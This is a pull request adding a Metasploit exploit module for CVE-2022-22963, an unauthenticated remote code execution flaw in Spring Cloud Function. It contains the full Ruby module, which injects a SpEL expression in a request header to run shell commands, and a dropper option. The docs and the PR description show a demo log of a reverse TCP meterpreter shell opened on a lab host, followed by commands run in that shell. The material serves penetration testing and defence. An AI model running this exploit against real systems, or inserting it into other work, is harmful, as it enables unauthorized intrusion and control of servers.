### PR TITLE
Add exploit for CVE-2022-22963 (Spring Cloud Function SpEL RCE)

### DIFF
--- a/documentation/modules/exploit/multi/http/spring_cloud_function_spel_injection.md
+++ b/documentation/modules/exploit/multi/http/spring_cloud_function_spel_injection.md
@@ -1,0 +1,82 @@
+## Vulnerable Application
+
+Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using
+an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting
+the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code
+execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.
+
+## Verification Steps
+
+1. Build the application
+   1. `wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip`
+   2. `unzip v3.1.6.zip`
+   3. `cd spring-cloud-function-3.1.6/spring-cloud-function-samples/function-sample-pojo`
+   4. `mvn package`
+2. Run the application
+   1. `java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar`
+3. Start msfconsole
+4. Run: `use exploit/multi/http/spring_cloud_function_spel_injection`
+5. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload associated datastore options
+6. Run the exploit
+
+## Options
+
+## Scenarios
+
+### Spring Cloud Function v3.1.6 on Fedora 34
+
+```
+msf6 exploit(multi/http/spring_could_function_spel_injection) > show options 
+
+Module options (exploit/multi/http/spring_could_function_spel_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /functionRouter  yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(multi/http/spring_could_function_spel_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Sending stage (39920 bytes) to 192.168.250.134
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:56924 ) at 2022-03-30 17:59:07 -0400
+
+meterpreter > getuid
+Server username: smcintyre
+meterpreter > pwd
+/home/smcintyre/spring-rce/spring-cloud-function-3.1.6/spring-cloud-function-samples/function-sample-pojo
+meterpreter > sysinfo
+Computer        : localhost.localdomain
+OS              : Linux 5.16.14-100.fc34.x86_64 #1 SMP PREEMPT Fri Mar 11 20:24:01 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```

--- a/modules/exploits/multi/http/spring_cloud_function_spel_injection.rb
+++ b/modules/exploits/multi/http/spring_cloud_function_spel_injection.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Spring Cloud Function SpEL Injection',
+        'Description' => %q{
+          Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using
+          an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting
+          the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code
+          execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.
+        },
+        'Author' => [
+          'm09u3r', # vulnerability discovery
+          'hktalent', # github PoC
+          'Spencer McIntyre'
+        ],
+        'References' => [
+          ['CVE', '2022-22963'],
+          ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],
+          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963']
+        ],
+        'DisclosureDate' => '2022-03-29',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'RPORT' => 8080,
+          'TARGETURI' => '/functionRouter'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'])
+    )
+
+    return CheckCode::Unknown unless res
+
+    # both vulnerable and patched servers respond with 500 and a JSON body with these keys
+    return CheckCode::Safe unless res.code == 500
+    return CheckCode::Safe unless res.get_json_document&.keys.to_set == %w[timestamp path status error message requestId].to_set
+
+    # best we can do is detect that the service is running
+    CheckCode::Detected
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'headers' => {
+        'spring.cloud.function.routing-expression' => "T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub("'", "''")}'})"
+      }
+    )
+
+    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500
+  end
+end

--- a/modules/exploits/multi/http/spring_cloud_function_spel_injection.rb
+++ b/modules/exploits/multi/http/spring_cloud_function_spel_injection.rb
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2022-22963'],
           ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],
-          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963']
+          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],
+          ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']
         ],
         'DisclosureDate' => '2022-03-29',
         'License' => MSF_LICENSE,
@@ -83,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # both vulnerable and patched servers respond with 500 and a JSON body with these keys
     return CheckCode::Safe unless res.code == 500
-    return CheckCode::Safe unless res.get_json_document&.keys.to_set == %w[timestamp path status error message requestId].to_set
+    return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)
 
     # best we can do is detect that the service is running
     CheckCode::Detected


### PR DESCRIPTION
Not to be confused with the 0-day currently under investigation. This vulnerability was patched [yesterday](https://github.com/spring-cloud/spring-cloud-function/commit/bcb2a25a28f3d026b35a795abe18d14f9cdb3022). This exploits an unauthenticated RCE in Spring Cloud Function where a malicious SpEL can lead to OS command execution.

 > Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using
          an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting
          the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code
          execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.

## Verification

List the steps needed to make sure this thing works

- [ ] Setup the environment from https://github.com/hktalent/spring-spel-0day-poc
- [ ] Start msfconsole
- [ ] Set the RHOSTS, RPORT, TARGET and PAYLOAD options
- [ ] Run the exploit and get a shell

## Demo

```
msf6 exploit(multi/http/spring_could_function_spel_injection) > show options 

Module options (exploit/multi/http/spring_could_function_spel_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /functionRouter  yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(multi/http/spring_could_function_spel_injection) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (39920 bytes) to 192.168.250.134
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:56924 ) at 2022-03-30 17:59:07 -0400

meterpreter > getuid
Server username: smcintyre
meterpreter > pwd
/home/smcintyre/spring-rce/spring-cloud-function-3.1.6/spring-cloud-function-samples/function-sample-pojo
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 5.16.14-100.fc34.x86_64 #1 SMP PREEMPT Fri Mar 11 20:24:01 UTC 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > 
```
